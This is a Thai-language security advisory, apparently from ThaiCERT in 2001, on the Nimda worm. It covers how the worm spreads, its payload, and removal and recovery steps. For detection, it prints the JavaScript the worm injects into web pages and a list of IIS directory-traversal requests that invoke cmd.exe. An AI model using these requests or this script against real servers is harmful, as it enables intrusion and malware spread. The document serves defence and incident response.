|
ชื่อ : W32.Nimda.A@mm
ค้นพบเมื่อ : 18 กันยายน 2544
ชนิด : หนอนอินเทอร์เน็ต (worm)
ชื่ออื่นที่เป็นที่รู้จัก : W32/Nimda.eml, W32/Nimda.htm,
W32/Nimda@MM, W32/Nimda@MM.eml, W32/Nimda@MM.htm
ระบบที่ได้รับผลกระทบ : Microsoft
Windows 95, 98, ME, NT, and 2000
!!!
ด่วน !!! ขณะนี้มีเครื่องมือสำหรับกำจัด Nimda
แล้วที่ Symantec
และ Antivirus.com
และ Mcafee
|
สำหรับการติดตั้ง
patch บน NT4 ให้ติดตั้งบน server ที่เป็นตัวทดลองก่อน
เพราะทาง ThaiCERT ได้รับรายงานจากผู้ใช้บ่อยครั้งว่า
ภายหลังการติดตั้ง patch แล้วทำให้ไม่สามารถบูตเครื่องได้
สำหรับท่านที่ยังไม่เข้าใจเรื่องการติดตั้ง service pack
หรือ patch นั้นขอแนะนำให้อ่านคำแนะนำได้ที่นี่ก่อน
หรืออาจจะใช้
hfnetchk ช่วยในการพิจารณาว่าจะติดตั้ง patch ในกรณีที่ไม่ต้องการเสี่ยงติดตั้ง
patch ขอแนะนำให้ใช้ urlscan
ซึ่งเป็นเครื่องมือในการกรอง request ที่ผิดปกติทิ้งไป
!!!
คำเตือน การติดตั้ง patch
กับ server นั้นควรติดตั้งกับ server ที่เป็นตัวทดสอบก่อนเสมอ
!!!
)
|
|
ภาพโดยรวม
หนอนอินเทอร์เน็ตชื่อ W32/Nimda หรือ Concept Virus (CV) v.5 ได้กระจายตัวอย่างรวดเร็ว
โดยมีวิธีในการแพร่กระจายดังนี้
- กระจายตัวจาก client ไปยัง client โดยผ่านทางอี-เมล์
- กระจายตัวจาก client ไปยัง client โดยผ่านทาง network
shares
- จาก web server (ที่ถูก compromised) ไปยัง client
โดยผ่านทาง web browser
- จาก client ไปยัง web server ( IIS 4.0/5.0 directory
traversal vulnerability VU #11677)
- จาก client ไปยัง web server ผ่านทาง backdoor
ที่เปิดไว้โดย Code Red II และ Sadmind/IIS worm
คำอธิบาย
ผู้ที่ใช้ workstation เช่น Windows 95, 98, ME, NT, 2000 และ server
เช่น Windows NT และ 2000 ก็ได้รับผลกระทบจาก Nimda
การแพร่กระจาย
หนอนตัวนี้กระจายตัวผ่านทางอี-เมล์ โดยฝังตัวไปกับอี-เมล์ในรูปแบบของ
MIME โดยจะมีสองส่วน ส่วนแรกคือ text/html MIME ซึ่งไม่ได้มีตัวอักษรใดๆ
ดังนั้นอี-เมล์ที่ได้รับจะมีลักษณะเป็นเมล์เปล่า ส่วนที่สองเป็น audio/x-wav
ซึ่งบรรจุไฟล์ readme.exe ซึ่งเป็นไบนารี่ไฟล์ที่สามารถรันได้
และจากช่องโหว่ในเรื่อง Automatic Execution of Embeded
MIME type ซึ่งจะมีผลทำให้ผู้ที่ใช้ mail software ใดๆ ก็ตามที่รันอยู่บน
x86 platform ที่ใช้ Microsoft Internet Explorer 5.5 SP1 หรือเก่ากว่า
(ยกเว้น IE 5.01 SP2) ซึ่ง render ตัว HTML mail ซึ่งจะทำให้ attachment
ถูกรันโดยอัตโนมัติ และจะทำให้เครื่องนั้นติดไวรัสไปทันที ทั้งนี้การ
render HTML mail จะเกิดขึ้นเมื่อเราแค่เปิดหรือ preview อีเมล์เท่านั้น
อี-เมล์ที่ส่งโดย Nimda จะมีลักษณะดังนี้
- ตัวอักษรที่ปรากฎที่ subject จะเป็นคำที่ไม่แน่นอน
ส่วนใหญ่จะมีความยาวมากกว่า 80 ตัวอักษร
- ไฟล์ attachment ที่ถูกส่งมาด้วยนั้นจะมีขนาด 57344
bytes
Payload
เครื่องที่ติด Nimda แล้วจะพยายามส่งอี-เมล์ไปยังทุก email address
ที่พบใน Windows address book
นอกจากนี้ มันจะพยายาม scan หา IIS server ที่มีช่องโหว่
ดังนี้
- เครื่องที่ถูก compromised โดย Code Red II และ
sadmind/IIS worm มาก่อนแล้ว ซึ่งเครื่องเหล่านั้นจะมี backdoor
ทิ้งไว้
- เครื่องที่มีช่องโหว่ของ IIS directory traversal
สำหรับการเลือก IP ของเครื่องเป้าหมายที่จะโดน scan
นั้น จะเลือกดังนี้คือ
- 50% ของเวลา IP ที่ถูกเลือกจะเป็น 2 octets แรกที่เหมือนกัน
- 25% ของเวลา IP ที่ถูกเลือกจะเป็น 1 octets แรกที่เหมือนกัน
- และอีก 25% จะถูกสุ่มขึ้นมา
Nimda จะ copy ตัวโค้ดของมันเองไปยัง server ที่ถูกค้นพบว่ามีช่องโหว่ดังกล่าว
หลังจากที่มันรันได้บน server นั้นแล้วมันจะ copy ตัวเองเป็นชื่อ README.EML
และเมื่อมันเจอ directory ที่เก็บข้อมูล web content (HTML, ASP) มันก็จะแทรก
javascript code ดังนี้
<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>
ซึ่งจะเป็นผลทำให้ผู้ที่เรียกดู web หน้าดังกล่าวได้รับไฟล์ไปด้วย
การแพร่กระจายผ่าน Browser
เมื่อ Nimda แก้ไข web content แล้ว และได้แทรก javascript code ดังกล่าว
ผู้ใช้ที่เรียกดูหน้า web ดังกล่าว ก็จะดาวน์โหลดไฟล์ดังกล่าวโดยอัตโนมัติ
แต่สำหรับบาง browser นั้นจะ execute ไฟล์ดังกล่าวในทันที ซึ่งก็จะติดไวรัสในทันที
การแพร่กระจายผ่านทางไฟล์
Nimda จะ copy ตัวมันเอง (ใช้ชื่อว่า README.EML) ไปยังทุกๆ directory
ที่ write ได้ รวมทั้ง network share ด้วย ถ้าผู้ใช้คนอื่นรันหรือ
preview ไฟล์นั้นๆ ผ่านทาง Windows Explorer (preview option enable)
ก็จะติดไวรัสในทันที
System Footprint
Nimda จะ scan ไปยัง IIS server ต่างๆ ดังนั้นที่ web server (port
80) นั้นๆ จะปรากฏ log หน้าตาดังนั้
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
ผลกระทบที่เกิดขึ้น
นอกจาก intruder จะสามารถรันไฟล์บน IIS แล้ว ยังก่อให้เกิดการใช้ bandwidth
ที่ค่อนข้างมาก และเสมือนกับการเกิด denial-of-service ในเครือข่ายด้วย
คำแนะนำก่อนการกำจัดไวรัส
- ให้ตัดการเชื่อมต่อของเครื่องที่ติดไวรัสออกจากเครือข่าย
- รัน Anti-Virus โดยให้ update anti-virus
software จากเว็บไซต์ของผู้ผลิต ซึ่งส่วนใหญ่ได้ปรับปรุงฐานข้อมูลไวรัสแล้ว
(ขณะนี้ทั้ง norton และ mcafee สามารถตรวจพบและฆ่าไวรัส Nimda ได้แล้ว
แต่ท่านต้องแก้ไขไฟล์ system.ini และ registry ด้วยตัวเอง โปรดดูรายละเอียดในส่วนคำแนะนำหลังการกำจัดไวรัส)
คำแนะนำเพิ่มเติมสำหรับ IIS Administrator
ให้ตรวจสอบว่า เครื่องของท่านถูก compromised มาก่อนหรือไม่ โดย
- ค้นหาไฟล์ที่ชื่อ root.exe (ถ้ามีแสดงว่าโดน compromised
โดย Code Red II หรือ sadmind/IIS worm)
- ค้นหาไฟล์ admin.dll หรือไฟล์ที่มีนามสกุล eml
ใน web content directory (ถ้ามีแสดงว่าโดน compromised โดย Nimda
เรียบร้อยแล้ว)
วิธีที่ปลอดภัยที่สุดในการกู้ระบบคืนคือ ให้ backup
ข้อมูล แล้วจึง format harddrive และติดตั้ง software ใหม่ทั้งหมด
และติดตั้ง security patch จาก vendor
คำแนะนำในการกู้ระบบคืนภายหลังจากโดน compromise : http://thaicert.nectec.or.th/paper/incident/recovery_nt_unix.php
patch ที่เกี่ยวข้องกับ Nimda ดาวน์โหลดได้ที่ http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
( สำหรับการติดตั้ง
patch นี้บน NT4 ให้ติดตั้งบน server ที่เป็นตัวทดลองก่อน เพราะทาง
ThaiCERT ได้รับรายงานจากผู้ใช้บ่อยครั้งว่า ภายหลังการติดตั้ง patch
แล้วทำให้ไม่สามารถบูตเครื่องได้ สำหรับท่านที่ยังไม่เข้าใจเรื่องการติดตั้ง
service pack หรือ patch นั้นขอแนะนำให้อ่านคำแนะนำได้ที่นี่ก่อน
หรืออาจจะใช้ hfnetchk
ช่วยในการพิจารณาว่าจะติดตั้ง patch
!!!
คำเตือน การติดตั้ง patch กับ server
นั้นควรติดตั้งกับ server ที่เป็นตัวทดสอบก่อนเสมอ !!!
)
คำแนะนำเพิ่มเติมสำหรับ End User
คำแนะนำหลังการกำจัดไวรัส
- เนื่อง software anti-virus ไม่ได้แก้ไข registry
และไฟล์ system.ini ให้ ดังนั้นเราจึงต้องทำด้วยตัวเอง
- แก้ไข registry ที่ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\[C$
-> Z$] โดยให้ลบ key เหล่านั้นให้หมด เพื่อกำจัดการ share folder
ในเครื่อง
- edit c:\windows\system.ini
- ค้นหาบรรทัดที่มี shell= explorer.exe load.exe
-dontrunold
- จากนั้นแทนที่บรรทัดดังกล่าวด้วย shell=explorer.exe
- สำหรับ WinNT/2K ในกรณีที่สามารถกู้คืนระบบกลับมาได้
กรุณาตรวจสอบ account Guest ว่า enable อยู่หรือไม่ ถ้า enable อยู่ก็ให้
disable ในทันที (และให้ลบ Guest ออกจาก Group Administrators ด้วย)
- หลังจากรัน anti-virus scan แล้วให้รีบูตเครื่องและรัน
anti-virus scan อีกครั้ง
Vendor Information
ปรับปรุงล่าสุด : 21 กันยายน
2544 13:12
|
